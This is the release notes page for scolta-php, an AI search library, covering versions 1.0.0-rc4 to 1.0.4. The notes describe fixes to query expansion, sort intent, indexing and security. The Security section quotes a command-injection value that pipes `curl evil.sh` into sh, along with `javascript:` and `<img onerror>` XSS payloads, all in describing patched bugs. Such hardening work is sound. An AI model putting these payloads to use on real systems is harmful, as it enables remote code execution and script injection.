Releases: tag1consulting/scolta-php
v1.0.4
Fixed
- AI sort-intent no longer fires on a hard sort word buried in a conversational/descriptive query (`src/Http/AiEndpointHandler.php`, `appendSortableFieldsInstruction()`). Regression (terra-collecta, 2026-06-17): the query "I am looking for a gift for my friend who likes the cheapest handmade items" returned `sort_hint: {field: "price", direction: "asc"}`, but "cheapest" there describes the items the friend likes, not a request to order results by price; the user wants gift ideas, not a price-sorted list. The `SORT INTENT` prompt block already carried the buried-phrase/unsorted-list litmus guidance, but its only negative gift example used the soft qualifier "affordable", so the model let STEP 4's hard-word mapping (`cheapest` → price asc) override the conversational frame. The prompt now adds an explicit hard-word buried negative example (the exact failing gift query) plus two STEP 3 descriptive-frame bullets, and states that a hard sort word (`cheapest`, `most expensive`, `newest`, `oldest`, `longest`, …) embedded in a conversational/descriptive frame is STILL NOT primary sort intent: the framing overrides the STEP 4 word→field mapping. STEP 4 fires only when ordering results is the query's whole point. This is an LLM-adherence fix: it tightens the prompt without changing the parser. The prompt-construction tests assert the new guidance strings are present; a committed `tests/fixtures/sort-intent-eval.json` battery tracks the failing query, 3 buried-conversational variants (`expectSort: null`), and the true-positive controls (`most expensive stone` → price desc, `cheapest crystals` → price asc, bare `cheapest` → price asc, `pierres les moins chères` → price asc, `newest posts` / `latest news` → date desc, `oldest articles` → date asc). Final verification is the browser regression re-run against the live model, since CI cannot drive the LLM deterministically.
- Dev-only files no longer ship in the Composer dist archive (`.gitattributes`, `scripts/validate-dist-archive.sh`). `git archive HEAD` (the tarball Composer downloads for a GitHub-hosted package) was still shipping `phpstan.neon`, `phpstan-baseline.neon`, and the `tools/stemmer-golden` Rust golden-data generator (a dev/CI-only stem oracle) to every Composer consumer: the PHPStan-config entry below claimed both neon files were excluded, but no `export-ignore` line backed the claim, and `tools/` was never excluded at all. Added `export-ignore` for `/phpstan.neon`, `/phpstan-baseline.neon`, and `/tools`, so the published package is smaller and carries no dev tooling; none of the three is loaded at runtime (`src/`, `templates/`, `assets/{js,css,wasm}` are untouched). The dist-archive gate is tightened to match: the three move out of the top-level allowlist into the excluded-paths mirror, so the gate now asserts they are absent and any reappearance fails CI.
- Auto-provisioned Amazee credentials stored without resolved model names no longer leave AI permanently broken (`src/AiProvider/Amazee/AutoProvisioner.php`). Provisioning persists credentials and resolves model names as two non-atomic steps (`AmazeeTrialProvisioner::provision()` stores the token+url, then calls `/model/info`). When the model-info call fails, `getAvailableModels()` swallows the error and returns `[]`, so the `$onModelsResolved` gate never fires and no model name is persisted. `ConfigStorageInterface::load()` requires only token+url, however, so it reports the half-provisioned credentials as valid. `ensureAiAvailable()` then short-circuited on `load() !== null` on every subsequent request and never re-resolved, so the caller fell back to the dated config default (`claude-sonnet-4-5-20250929`), which the Amazee LiteLLM gateway rejects with HTTP 400 "Invalid model name". AI failed silently (summarize returns `{}`, expand returns an unexpanded 200) with no self-recovery. This is outside `KeyExpiryRecovery`'s remit, which handles only auth-class failures. `ensureAiAvailable()` now accepts an optional `$hasResolvedModels` predicate: when stored credentials exist but the caller reports models are still unresolved, model resolution is re-attempted against the already-stored key (never a fresh trial, which would waste a server-limited allocation) and `$onModelsResolved` fires with the result, so the incomplete-provision state self-heals on the next lazy-init pass. Without the predicate the historical no-op is unchanged. A regression test drives the full provision → failed-resolution → store → re-resolve sequence. (The dated-default fallback itself lives in the platform adapters' client construction, which adopt the predicate when they re-vendor.)
Security
- Configured Pagefind binary paths are now shell-escaped before execution (`src/Binary/PagefindBinary.php`). Both `version()` and the internal `isExecutable()` probe interpolated the binary path directly into `exec($binary . ' --version 2>/dev/null')`. The configured path can come from platform settings (admin forms, config files), so a value like `/usr/bin/pagefind; curl evil.sh | sh` executed a second command. A new public `escapeShellCommand()` helper applies `escapeshellarg()` to the whole path, special-casing known multi-word commands (`npx pagefind` is split and escaped per token so it still runs as command + argument). `downloadTargetDir()` also now throws on `mkdir()` failure instead of silently returning a directory that was never created. Regression tests assert the composed command string for metacharacter, command-substitution, embedded-space, and `npx pagefind` inputs; nothing is executed.
- Markdown link URLs are scheme-gated on both renderers (`src/Util/MarkdownRenderer.php` + `formatInline` in `assets/js/scolta.js`). Both sides turned any `[text](url)` in AI output into a clickable link, so a `javascript:` / `data:` URL in a model response (or via prompt injection through indexed content) became a live link; the JS side's domain allowlist only engaged when `allowedDomains` was non-empty, i.e. it failed open in the default configuration. Both renderers now allow only absolute `http(s)` URLs and scheme-less relative paths, rendering everything else as plain text. Control characters and whitespace are stripped before scheme detection because browsers ignore them when parsing a scheme (`jav\tascript:` executes). The JS side additionally attribute-escapes the href (the summary text is escaped with `escapeHtml`, which leaves `"` intact, so a quote inside an otherwise-allowed URL could previously break out of the `href` attribute). Covered by PHPUnit tests (`javascript:`, `data:`, tab-split scheme, relative and http(s) controls) and JSDOM Jest tests driving the real rendering path.
- Attribute interpolations in `assets/js/scolta.js` use a new quote-escaping `escapeAttr()`, and result-card hrefs are scheme-checked. `escapeHtml()` is a `textContent → innerHTML` round-trip that does not escape quotes, but it guarded attribute contexts: the LLM-generated expanded terms in `data-scolta-search-term="…"`, filter dimension/value attributes on dismiss buttons and checkboxes, and the result-title `title` attribute. A value containing `"` could close the attribute and mint new ones (e.g. event handlers). Result cards also interpolated the raw `${url}` into two `href`s, so a poisoned document URL like `javascript:…` became clickable. Every attribute interpolation now uses `escapeAttr()` (escapes `&<>"'`); `escapeHtml()` remains for text nodes. Result-card hrefs go through `sanitizeUrlAttr()`, which attribute-escapes allowed (http(s)/relative) URLs and renders anything else as inert `#`. JSDOM Jest regression tests (`tests/js/security-render.test.js`) prove a `"`-bearing expanded term cannot break out of its attribute and a `javascript:` result URL is not clickable.
- `stripHtml()` in `assets/js/scolta.js` parses untrusted HTML in an inert document. It previously assigned untrusted excerpt/title HTML to `innerHTML` of a live detached `<div>`, whose subtree shares the page's document; resource-bearing elements (`<img src onerror=…>`) load eagerly there in real browsers. It now uses `new DOMParser().parseFromString(text, 'text/html').body.textContent`, which neither runs scripts nor loads resources. A Jest test drives an `<img onerror>` payload through the real render path, plus a structural pin that the function stays DOMParser-based (the behavioral test alone cannot catch a revert in JSDOM, which loads no resources either way).
- `FilesystemDriver::deleteDirectory()` no longer follows symlinks (`src/Storage/FilesystemDriver.php`). The delete loop called `rmdir` / `unlink` on `$item->getRealPath()`, which resolves symlinks, so deleting a retired index tree containing a planted (or accidental) symlink deleted the link target, potentially outside the tree (the recursive iterator does not follow links for traversal, but realpath re-introduced the hop at delete time). The loop now operates on `getPathname()` and unlinks links themselves (`isLink()` checked before the dir/file branch, since `isDir()` follows links too). A regression test builds a tree containing symlinks to an outside file and an outside directory and asserts both targets survive deletion. `exists()` also now calls `validatePath()`; it was the only driver method skipping the stream-wrapper guard every sibling applies.
- Follow-up conversations enforce content-size caps (`src/Http/AiEndpointHandler.php`). `handleFollowUp()` validated roles and the message cadence but no sizes, while its sibling endpoints cap the query at 500 bytes and summarize context at 100k, so a client could relay arbitrarily large payloads straight to the AI provider. Each message's content is now capped at 100,000 characters (mirroring the summarize context safety net, since the first user turn legitimately embeds search context) and the conversation total at 400,000 characters, both returning HTTP 400. The caps are measured in Unicode characters via `m...
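The scheme gate and attribute escaping described in the Security entries above can be sketched roughly as follows. This is a minimal illustration, not the code shipped in `assets/js/scolta.js`: the names `escapeAttr` and `sanitizeUrlAttr` come from the notes, but the bodies, the `isAllowedUrl` helper, and the exact character ranges are assumptions.

```javascript
// Illustrative sketch only; bodies are assumed, not copied from scolta.js.

// Escape the five characters that matter inside a quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;') // must run first so later entities are not re-escaped
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical helper: true for http(s) URLs and scheme-less relative paths.
function isAllowedUrl(url) {
  // Browsers ignore control characters and whitespace while parsing a scheme,
  // so strip them before looking for one ("jav\tascript:" must not slip through).
  const cleaned = String(url).replace(/[\u0000-\u0020\u007f]/g, '');
  const scheme = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(cleaned);
  if (scheme === null) {
    return true; // no scheme at all: treat as a relative path
  }
  const name = scheme[1].toLowerCase();
  return name === 'http' || name === 'https';
}

// Allowed URLs are attribute-escaped; everything else becomes an inert "#".
function sanitizeUrlAttr(url) {
  return isAllowedUrl(url) ? escapeAttr(url) : '#';
}

const href = sanitizeUrlAttr('jav\tascript:alert(1)');
console.log(`<a href="${href}">result</a>`); // the link target is "#"
```

Checking the scheme on a cleaned copy while escaping the original keeps the two concerns separate: the gate decides whether the URL may be a link at all, and the escaper guarantees it cannot leave the attribute.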
v1.0.3
Added
- Regression snapshot test pinning the `summarize` CORPUS AWARENESS prompt bullet. A new test (`testSummarizeCorpusAwarenessMatchesCanonicalSnapshot`) reads `tests/fixtures/corpus-awareness-bullet.txt` and asserts the resolved `'summarize'` template (`DefaultPrompts::getTemplate()`) contains that exact bullet byte-for-byte, guarding against silent drift (follow-up to the tag1consulting/scolta-core#33 corpus-statistic fix). The fixture is kept hand-identical to the matching bullet in scolta-core's `SUMMARIZE` constant. Test-only; no runtime change.
- Category-member and context decomposition rules in the default `expand_query` prompt (tag1consulting/scolta-core#36). The `'expand_query'` template (resolved server-side by `DefaultPrompts` for the AI path) gains two rules so the model decomposes a grouping into concrete terms instead of restating it as an abstract synonym: rule 13 (CATEGORY → MEMBERS) expands a category/family/region into its well-known members ("version control systems" → Git/Mercurial/Subversion; "Southeast Asian food" → Thai/Vietnamese/Indonesian), and rule 14 (CONTEXT / USE-CASE → CONCRETE ITEMS) expands a context/occasion into the item types that serve it ("home office setup" → standing desk/ergonomic chair/monitor arm). Both lead with non-food examples so the behavior generalizes across domains, and rule 13 forbids fabricating members for categories the model does not know; those fall back to normal alternate phrasings. The 2-4 term cap is reconciled to allow up to 6 concrete members when decomposing, and rule 7 is narrowed to taxonomy/filter-label matching so it no longer contradicts rule 13. Additive: queries that are not categories or contexts expand exactly as before. The template is byte-identical to scolta-core's `EXPAND_QUERY` constant; the browser-side WASM must be rebuilt downstream to match.
- Round-robin AI-summary candidate selection across expansion sub-queries (#170). When a query fans out into distinct sub-topics of unequal corpus size (e.g. "traditional dishes from Southeast Asia" → Thai, Vietnamese, Indonesian, …), the relevance-union top-N that feeds the AI summarizer is filled entirely by the single largest sub-query, so the overview can only ever describe that one sub-topic. Two new browser-side config keys address this: `expansionCombineMode` (`relevance_union` default | `round_robin`) and `expansionPerTermTopK` (default `3`). Under `round_robin`, `scolta.js` stamps each loaded result with the expansion sub-query that produced it (`__scoltaSourceTerm`), groups the summary candidate pool by that provenance, and deals the top-K from each sub-query in turn until `aiSummaryTopN` is filled, so the summarizer sees breadth across sub-topics. The reallocation stays within the existing `aiSummaryTopN` / `aiSummaryMaxChars` budgets and never exceeds them. The default `relevance_union` reproduces current behavior exactly, and the visible ranked result list is unchanged (always relevance-sorted); round-robin only affects what the summarizer is shown. A single-sub-query pool (focused single-intent query) is identical to `relevance_union`.
- `ConfigReferenceDocTest`: a CI guard that keeps `docs/CONFIG_REFERENCE.md` in sync with `ScoltaConfig`. The new test parses the property tables and preset table in `CONFIG_REFERENCE.md` and asserts that every documented scalar default equals the live `ScoltaConfig` default, that every scalar property is documented, and that every non-default preset override is documented with a matching value. It fails loudly if the tables can no longer be parsed, so a future doc reformat surfaces as a fixable failure rather than a silently-skipped check. This is the guard that would have caught the README default drift fixed in this release. The test also pins `docs/TUNING.md`: that guide restates the current global default for each scoring parameter it discusses (its `**Config:** … — **Default: X**` lines), and those restatements can drift independently of `CONFIG_REFERENCE.md`, so a new `test_documented_tuning_guide_defaults_match_live_config` asserts each one equals the live `ScoltaConfig` default too.
- `docs/TUNING.md`: the canonical scoring-tuning evidence guide. Opens with a plain "choose your site type → preset" section for admins, then the full scoring-sweep evidence (precision-cliff data, per-parameter sweeps, methodology, and which defaults are still open findings) for maintainers. Cross-links `CONFIG_REFERENCE.md` for the property list and the site-type → preset table rather than duplicating them; `CONFIG_REFERENCE.md`'s preset section now links back to it.
- `assets/ASSETS.sha256` manifest covering all duplicated front-end assets. The four browser assets duplicated into scolta-drupal and scolta-wp (`js/scolta.js`, `css/scolta.css`, `wasm/scolta_core.js`, `wasm/scolta_core_bg.wasm`) are now hashed into a single manifest, regenerated by the new `composer update-asset-manifest` script. The adapters drive both their dev-time copy and their CI drift guard from this one manifest, so a newly added asset can no longer be guarded in one place and forgotten in another. `update-browser-wasm` now regenerates the manifest after copying the WASM. The existing per-file `assets/js/scolta.js.sha256` is retained (scolta-laravel's `HealthController` and `StatusCommand` read it at runtime as a bare hash) but is now derived from `ASSETS.sha256` rather than hashed independently: `update-js-checksum` regenerates the manifest and then extracts the `js/scolta.js` line into the standalone file, so every asset SHA-256 comes from one computation and the two files can never diverge. A new `AssetManifestTest` fails CI if the committed manifest is stale, any listed asset is missing, the standalone checksum drifts from the manifest's `js/scolta.js` line, or that file stops being a bare 64-hex hash.
- `AiServiceAdapter::handlePossibleBudgetException()` hook. The base `message()`, `conversation()`, and `messageForOperation()` methods now wrap their AI call in a `try/catch (\RuntimeException)` that invokes a new protected `handlePossibleBudgetException()` hook before re-throwing. The base hook is a no-op, so behavior is unchanged for callers; platform adapters (scolta-drupal, scolta-laravel, scolta-wp) override it to convert an Amazee budget-exhaustion error into `AmazeeBudgetExceededException` (and notify a budget handler) without each having to override all three AI methods. This removes the need for the three near-identical try/catch overrides duplicated in every adapter. Backward-compatible: an un-updated adapter that still overrides the three methods keeps working because the wrapper exception's message does not contain the `Budget has been exceeded!` guard string, so the doubled hook call is an idempotent no-op on the second pass.
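One way to read the round-robin candidate selection described in this list is sketched below. It is an assumption-laden illustration, not the `scolta.js` implementation: the function name `selectSummaryCandidates` and its parameter order are hypothetical, and "deals the top-K from each sub-query in turn" is interpreted here as taking up to K results per sub-query per round. Only `__scoltaSourceTerm`, the two mode names, and the default K of 3 come from the notes.

```javascript
// Hypothetical sketch: `results` is assumed to be relevance-sorted, and each
// item is assumed to carry the __scoltaSourceTerm stamp described above.
function selectSummaryCandidates(results, topN, mode = 'relevance_union', perTermTopK = 3) {
  if (mode !== 'round_robin') {
    return results.slice(0, topN); // plain relevance-ordered top-N
  }

  // Group by the sub-query that produced each result, keeping relevance order.
  const groups = new Map();
  for (const result of results) {
    const term = result.__scoltaSourceTerm;
    if (!groups.has(term)) groups.set(term, []);
    groups.get(term).push(result);
  }

  // Each round deals up to K results from every group in turn.
  const picked = [];
  let offset = 0;
  while (picked.length < topN) {
    let dealt = false;
    for (const queue of groups.values()) {
      for (const result of queue.slice(offset, offset + perTermTopK)) {
        if (picked.length >= topN) break;
        picked.push(result);
        dealt = true;
      }
    }
    if (!dealt) break; // every group is exhausted
    offset += perTermTopK;
  }
  return picked;
}

const pool = [
  ...['t1', 't2', 't3', 't4', 't5'].map((id) => ({ id, __scoltaSourceTerm: 'thai' })),
  ...['v1', 'v2'].map((id) => ({ id, __scoltaSourceTerm: 'vietnamese' })),
  { id: 'i1', __scoltaSourceTerm: 'indonesian' },
];
console.log(selectSummaryCandidates(pool, 6, 'round_robin', 2).map((r) => r.id));
// → [ 't1', 't2', 'v1', 'v2', 'i1', 't3' ]
```

Under this reading a pool with a single sub-query degenerates to the plain top-N slice, which matches the note that a focused single-intent query behaves like `relevance_union`.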
Fixed
- `fromArray()` now treats `null` as "not set," so adapters can fall through to a Site Type preset. The override loop previously assigned every key present in the input over the preset's values, with no way to express "this field is unset, use the preset." Adapters that omit a key (Drupal, WordPress) got preset fall-through for free, but an adapter whose config layer always emits a key for every field (notably Laravel's `config/scolta.php`) could never reach a preset's value: its concrete config default always won, leaving the entire Site Type preset (~12–15 scoring/display fields, not just `expansionCombineMode`) inert. `fromArray()` now skips any `null` value (`null` = "not set" → use the preset, or the base default when no preset is named); an explicit non-null value still overrides. This makes the unset contract explicit for every adapter and removes a latent `TypeError` (assigning `null` to a typed property previously threw). This is the central fix that enables adapters, especially Laravel, to honor presets; the Laravel config defaults switch to `null` in its own PR. `CONFIG_REFERENCE.md` documents the contract in prose.
- AI summaries no longer truncate mid-sentence on multi-item results (#168). `aiSummaryMaxTokens` defaulted to `512`, but `max_tokens` is a hard ceiling, not a target: a 6-item summary with one-sentence descriptions plus ad-hoc subcategory headers overran it and was cut at the token boundary mid-word. Two complementary fixes: the default is raised to `1024` (the prompt structurally bounds real output to ~300–600 tokens, so this adds headroom without inviting longer output), and the `'summarize'` template's FORMAT RULES now state an explicit output-length budget: keep the summary under ~150 words, with a single flat bulleted list and no section/sub-category headers. The raised ceiling guarantees nothing is cut; the stated budget keeps natural output short. No preset overrides `ai_summary_max_tokens` below the default. The prompt line matches scolta-core's `SUMMARIZE` constant.
- Removed the Wikipedia-specific corpus statistic from the default `summarize` prompt. The `CORPUS AWARENESS` rule in the `'summarize'` template shipped a hard-coded "~6,900 Featured Articles" example that described only the Wikipedia demo, reached every site using the default prompt (the server resolves this template for the AI overview), and taught the model to fabricate corpus counts. The example is now count-free and frames gaps via the site description's scope, and the rule explicitly forbids inventing statistics (counts, totals, sizes). Matches the same change in scolta-core's `SUMMARIZE` constant (tag1consulting/scolta-core#33).
Changed
- **Facet panel is now index-driven and static, with exact typed-query counts that don't move on AI expansion or when you click a fac...
v1.0.2
Removed
- Reverted the entire query-word-importance line (#163 exemption + #164 ranking). Validation showed both layers were inert: the #164 `incidentalMatchWeight` re-ranking and the #163 semantic exemption gate changed result ordering on zero real queries. Removed: the `query_word_importance` plumbing into the WASM `score_results` input and the JS fallback weighting, the `incidentalMatchWeight` config, the `aiQueryWordImportance` flag, the expand-prompt classification instruction and its `query_word_importance` parsing in `AiEndpointHandler`, the `contentWords` exemption gate in `scolta.js`, and the bundled WASM that carried the scoring weight. The #156 frequency guard (#161) and the Fix A/D typed-query-term exemption + `expandSubwordDenyList` veto (#162) are unchanged; the browser tree is back to its #162 state, with the bundled WASM matching the reverted scolta-core.
Fixed
- Sub-word frequency guard no longer drops words the user actually typed (#156 follow-up). The #156 guard used corpus frequency as a proxy for "non-discriminating / generic," but in a topical corpus a word is often high-frequency because it is the subject matter; the proxy conflates "common because central" with "common because generic." So searching `spicy` on a recipe corpus had its typed subject word (~6.4% of docs, above the `0.05` / `0.10` threshold) silently dropped from the decomposed expansion terms, collapsing recall. The frequency check is now bypassed for any sub-word that is a token of the user's actual query (Fix A), with a per-site `expandSubwordDenyList` veto for the rare word that is both typed and genuinely generic (Fix D). Non-query expansion-derived words (e.g. `fried`, `tender`) remain frequency-gated as before.
- `customStopWords` now applied consistently in `scolta.js` (#156 follow-up). `extractSearchTerms()` previously filtered against only the built-in `STOPWORDS` set, so JS query tokenization ignored `customStopWords` while the WASM scorer honored it. JS now strips the union of `STOPWORDS` and `customStopWords`, matching WASM.
- Broad multi-word queries recover the recall lost in v1.0.0 (closes #156). Commit `690a2288` removed the sub-word expansion block from `scolta.js`, causing broad-query result counts to drop 4–50× on high-overlap corpora. Sub-word expansion is reintroduced behind a corpus-frequency guard: a multi-word expansion term's constituent words are added as search terms only when each word's corpus frequency is below `expandSubwordMaxFrequency` (default `0.05`; `0.10` for the `content_catalog` and `none` presets). This restores low-frequency domain words ("vegetarian", "cuisine") while blocking high-frequency noise ("recipes", "cooking") that polluted pre-v1.0.0 results. Frequency is measured against the same active filters the search uses (including the language partition when `autoLanguageFilter` is on), so the denominator matches the corpus actually being searched. The guard applies in both the relevance and native-sort code paths. Setting the threshold to `0` reproduces v1.0.0 (no sub-words); `>= 1.0` reproduces the pre-v1.0.0 behavior (all sub-words).
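The frequency guard with its typed-word exemption (Fix A) and deny-list veto (Fix D) can be pictured with a sketch like the one below. The function `admitSubwords`, its signature, and the `frequencyOf` callback are hypothetical; only the two config keys and the `0.05` default are taken from the notes. How the shipped guard treats the boundary thresholds (`0` and `>= 1.0`) is not modeled here.

```javascript
// Hypothetical sketch of the guard; not the scolta.js implementation.
// frequencyOf(word) is assumed to return the fraction of indexed documents
// (under the active filters) that contain the word.
function admitSubwords(expansionTerm, queryTokens, frequencyOf, config = {}) {
  const { expandSubwordMaxFrequency = 0.05, expandSubwordDenyList = [] } = config;

  const words = expansionTerm.toLowerCase().split(/\s+/).filter(Boolean);
  if (words.length < 2) return []; // only multi-word terms are decomposed

  const typed = new Set(queryTokens.map((token) => token.toLowerCase()));
  const denied = new Set(expandSubwordDenyList.map((word) => word.toLowerCase()));

  return words.filter((word) => {
    // Fix A: words the user typed skip the frequency check,
    // unless the site vetoed them via the deny list (Fix D).
    if (typed.has(word) && !denied.has(word)) return true;
    return frequencyOf(word) < expandSubwordMaxFrequency;
  });
}

// Frequencies below are made up for illustration, except the ~6.4% figure
// for "spicy" quoted in the notes.
const frequencies = { spicy: 0.064, vegetarian: 0.02, recipes: 0.4 };
const frequencyOf = (word) => frequencies[word] ?? 0;

console.log(admitSubwords('spicy vegetarian recipes', ['spicy'], frequencyOf));
// → [ 'spicy', 'vegetarian' ]
console.log(admitSubwords('spicy vegetarian recipes', ['spicy'], frequencyOf, {
  expandSubwordDenyList: ['spicy'],
}));
// → [ 'vegetarian' ]
```

The deny list only removes the exemption; a vetoed word is still admitted if its frequency falls under the threshold, which fits the description of the list as guard-only.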
Added
- `expandSubwordDenyList` config option (default `[]`). Guard-only veto list for the sub-word query-term exemption (#156 follow-up). Words here are never auto-exempted from the sub-word frequency guard even when the user types them, so a site can stop a typed generic word (e.g. `hot` on a recipe corpus) from re-flooding results via the exemption. Unlike `customStopWords` this does NOT affect relevance scoring or query tokenization; the word stays searchable and scorable. Configurable via `expand_subword_deny_list` in all platform adapters.
- `expandSubwordMaxFrequency` config option (default `0.05`). Maximum corpus frequency (fraction of indexed documents) for a multi-word expansion term's constituent word to be added as a standalone search term. Configurable via `expand_subword_max_frequency` in all platform adapters. Presets `content_catalog` and `none` ship `0.10`; `reference`, `ecommerce`, and `blog` use the `0.05` default. Set to `0` to disable sub-word expansion entirely.
- Result-count baseline regression test (`tests/js/result-count-baseline.test.js` + `tests/fixtures/result-count-baseline.json`). Drives the real `scolta.js` guard against a synthetic corpus built from real measured frequencies and asserts merged result counts stay within a per-demo band, flagging both recall collapse (sub-word block removed) and precision spikes (high-frequency noise admitted). This is the regression guard whose absence let `690a2288` ship a silent count drop.
- Sub-word frequency guard behavioral test (`tests/js/subword-frequency-guard.test.js`). Executes `scolta.js` against a recording Pagefind mock and asserts only sub-words below the threshold feed results, covering the boundary behaviors (`0` and `>= 1`).
Changed
- Opened 1.0.2-dev development cycle.
- Scoring default tuning from the full-matrix sweep (120+ queries, 9 demos). `crossListBonus` default `0.15` -> `0.05` (a smaller tie-breaker that doesn't override single-source precision); `recencyBoostMax` default `0.5` -> `0.25`, with preset overrides `reference: 0`, `content_catalog: 0`, and `blog: 0.25` (recency adds noise on non-time-sensitive content); `titleMatchBoost` default `1.0` -> `2.0` (improves top-1 precision across all demos; already shipped in the `reference` / `content_catalog` presets). These are ranking-quality changes independent of the #156 recall fix.
v1.0.1
Fixed
- Binary indexer now emits canonical URLs instead of build-artifact URLs. `ContentExporter` writes exported HTML files in a nested directory structure mirroring the canonical URL (`/recipe/cake/` → `recipe/cake/index.html`) so Pagefind `--site` derives a `data.url` identical to the PHP indexer's. Previously, flat `{id}.html` exports caused `data.url = /{id}.html`, a path that 404s on the live site. Resolves the root cause behind #155 and closes #157.
- AI summary citation URLs now prefer canonical `meta.url` over the Pagefind file path. Both `summarizeResults()` (WASM path) and `buildLLMContext()` (JS fallback) now use `r.data.meta?.url || resolveUrl(r.data.url)`, matching the pattern already used in the result card renderer. Fixes #155.
- Added `vendor/` to `archive.exclude` in `composer.json` to prevent dev `vendor/` from leaking into dist archives when installed via Composer path repositories.
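The citation-URL preference in the second entry above amounts to a one-line fallback. The sketch below isolates it; `citationUrl` is a hypothetical wrapper, and `resolveUrl` is reduced to a stand-in because the real helper in `scolta.js` is not shown in these notes.

```javascript
// Stand-in for the real resolveUrl() in scolta.js (assumed; behaviour not shown here).
function resolveUrl(path) {
  return path;
}

// Hypothetical wrapper around the expression quoted in the release note:
// prefer the canonical meta.url, fall back to the Pagefind file path.
function citationUrl(r) {
  return r.data.meta?.url || resolveUrl(r.data.url);
}

console.log(citationUrl({ data: { url: '/42.html', meta: { url: '/recipe/cake/' } } }));
// → /recipe/cake/
console.log(citationUrl({ data: { url: '/42.html' } }));
// → /42.html
```

Using `||` rather than `??` means an empty-string `meta.url` also falls back to the resolved file path.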
Added
- `ContentExporter::urlToExportPath()`: maps a canonical URL to the export file path Pagefind will crawl. Shared by all platform adapters.
- `ContentExporter::countHtmlFiles()`: recursive HTML file count, replacing flat `glob('*.html')` in adapters.
- `ContentExporter::writeManifest()` / `readManifest()`: ID-to-path manifest for incremental deletes in the nested layout.
- `ContentExporter::deleteById()` / `deleteByUrl()`: delete export files by item ID (manifest + flat fallback) or canonical URL.
- Indexer URL parity test (`IndexerUrlParityTest`) that joins fragments by stable item ID and asserts `data.url` equality, collision detection, and `urlToExportPath` mapping correctness.
- Citation URL structural tests in JS test suite: locks the `meta.url ||` fallback pattern in both summary builders.
Documentation
- Clarified independent versioning model. CLAUDE.md, CHANGELOG.md, and UPGRADE.md now state that minor and patch versions are released independently per package, with adapters pinning scolta-php via `composer.lock` within their `^1.x` constraint. Added a comment to `scripts/check-version-sync.php` noting it is a local-only major check.
Upgrade notes
Binary-indexer sites must run a full rebuild after upgrading. The export layout changed from flat {id}.html to nested directories mirroring canonical URLs. A stale index will retain the old /{id}.html URLs that 404 on the live site. The health-check warning added in #158 will surface a pre-fix index automatically.
Scolta 1.0.0
AI-powered search for Drupal, WordPress, and Laravel — now stable.
What is Scolta?
Scolta is an open-source, AI-powered search platform that replaces the default search on Drupal, WordPress, and Laravel sites with intelligent, semantic search. It uses a Rust/WASM core for scoring, query expansion, and relevance ranking, with a shared PHP library and thin CMS-specific adapters. Scolta is built by Tag1 Consulting and powered by Amazee.ai for AI infrastructure.
scolta-php is the shared PHP library that all CMS adapters depend on. It provides the PHP indexer, AI summary with streaming, query expansion, filter/sort infrastructure, and content management layer that powers every Scolta installation.
1.0.0 Stable Release
This is the foundation library that Drupal, WordPress, and Laravel packages build on. Highlights of the stable release:
- PHP indexer with no binary dependency — index content using pure PHP
- AI summary with streaming for real-time answer generation
- expand_query with disambiguation for intelligent query rewriting
- Filter/sort infrastructure with two-pass matching, subcategory support, and price sort patterns
- Memory pressure handling with stream tokenization for large sites
- API error handling (401/429/503) with graceful degradation
- Amazee.ai provider support for managed AI infrastructure
- E2E test suite covering the full search pipeline
Changes Since RC4
Search Quality
- Subcategory matching in filter field descriptions
- `exactTitleMatchBoost` config option for precise title relevance
- `crossListBonus` config option for multi-index scoring
- Expansion merge cross-list bonus scoring
- Expansion phrases no longer word-exploded
- Sort-intent fallback when Pagefind returns few results
- Sort-without-filter fallback
- Sort intent no-fallback rule
Filters and Facets
- Filter exact-match-first (two-pass matching)
- `filter_hint` canonicalization against Pagefind filters
- Ascending price sort patterns recognized
- Subject filter UI state updates (badges + checkboxes)
- Multi-value filter array counting fix
- Multi-value facet OR syntax fix
- Facet count refresh after filter selection
- Filter+sort discovery replacing intersection heuristic
AI Overview
- AI Overview italic/bold+italic markdown rendering
- Corpus-awareness in summarize/follow-up prompts
- AI Summary reflects user-selected facet filters
- StreamingFormatWriter multi-value filter fix
Indexer
- PHP indexer memory reduction (stream tokenization)
- Index completeness verification on exit
- PhpIndexer sortable/metadata passthrough fix
- Memory regression test for `processChunk()`
Infrastructure
- Filter field description validation test
Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0/CHANGELOG.md
Getting Started
`composer require tag1/scolta-php`
Most users will install one of the CMS-specific packages (scolta-drupal, scolta-laravel, or scolta-wp), which pull in scolta-php automatically.
Scolta 1.0.0-rc4
Fourth release candidate for Scolta 1.0 — AI-powered search for Drupal, WordPress, and Laravel.
Highlights
Fixed
- Expand-query prompt disambiguation: Rule 9 now uses the site's domain context to disambiguate multilingual queries before falling back to generic interpretation. A German query like "Zweig" on a Git docs site is now expanded to branch-related terms instead of famous authors.
- Composer archive excludes tests/: `composer.json` `archive.exclude` prevents ~4 MB stemmer corpus and fixtures from shipping in dist archives.
- API error handling: `AiClient` now throws `ApiKeyInvalidException` (401) and `RateLimitException` (429 + `Retry-After` header) instead of wrapping all upstream errors as generic 503.
- E2E test race condition: `uniqid()` collision on multi-vCPU CI fixed by appending `getmypid()` to state-directory names.
- Foreign language "No Results Found" flash: UI now suppresses premature empty-state display while AI expansion is still translating/expanding the query.
- Follow-up queries resolve numbered result references — "#6", "the third one", etc. now map to the correspondingly numbered entry in search context.
- Sort-intent prompt restructured as a 4-step decision sequence to eliminate false positives (discovery qualifiers) and false negatives (adverb+participle recency forms).
Added
- `showAttribution` config option: opt-in "Powered by Scolta" display (default `false`), per WordPress.org Guideline 10.
- `.gitattributes` export-ignore: dev files (tests/, .github/, benchmarks/, scripts/) excluded from `git archive` distributions.
- AI Overview metadata enrichment: structured metadata per result with sort/filter indicators in LLM context.
- Generic sort and filter prompt infrastructure: `sortableFieldDescriptions`, `filterFields`, `filterFieldDescriptions` config properties.
- Memory pressure handling: `gc_mem_caches()` on PHP 8.3+, RSS-based 75% threshold voluntary restart.
- Sort override subject filter: parallel subject-only search intersects with sorted results to prevent irrelevant items.
- Pagefind native sort: sort hints now use Pagefind's index-level sort instead of client-side reranking.
- Auto date sortable field: `ContentItem::$date` automatically included in sort attributes.
- `ContentItem::cloneWith()`: safe field-level overriding without silent field loss.
- Multi-value filter support in `PagefindHtmlBuilder`.
Full Changelog: https://github.com/tag1consulting/scolta-php/blob/v1.0.0-rc4/CHANGELOG.md
